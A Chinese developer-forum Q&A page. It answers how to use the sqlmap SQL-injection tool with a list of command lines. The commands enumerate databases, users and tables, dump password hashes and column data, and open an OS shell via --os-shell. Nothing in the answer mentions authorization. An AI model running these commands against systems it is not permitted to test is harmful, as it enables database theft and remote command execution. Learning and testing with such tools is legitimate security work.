开发者社区 问答 正文

python sqlmap 怎么用

python sqlmap 怎么用

展开
收起
云计算小粉 2018-05-10 20:10:59 1496 分享 版权
1 条回答
写回答
取消 提交回答
  • 解压sqlmap到硬盘

    比如D:/sqlmap,打开CMD,输入python D:sqlmapsqlmap.py 就可以用了。

    列几个基本命令

    ./sqlmap.py –h //查看帮助信息

    ./sqlmap.py –u “域名” //get注入

    ./sqlmap.py –u “域名” --data “DATA”//post注入

    ./sqlmap.py –u “域名” --cookie “COOKIE”//修改请求时的cookie

    ./sqlmap.py –u “域名” --dbs //列数据库

    ./sqlmap.py –u “域名” –-users //列用户

    ./sqlmap.py –u “域名” –-passwords //获取密码hash

    ./sqlmap.py –u “域名” –-tables -D DB_NAME //列DB_NAME的表

    ./sqlmap.py –u “域名” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列

    ./sqlmap.py –u “域名” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据

    ./sqlmap.py –u “域名” –-os-shell //取得一个shell

    2019-07-17 22:24:24
    赞同 展开评论
问答分类:
问答标签:
问答地址: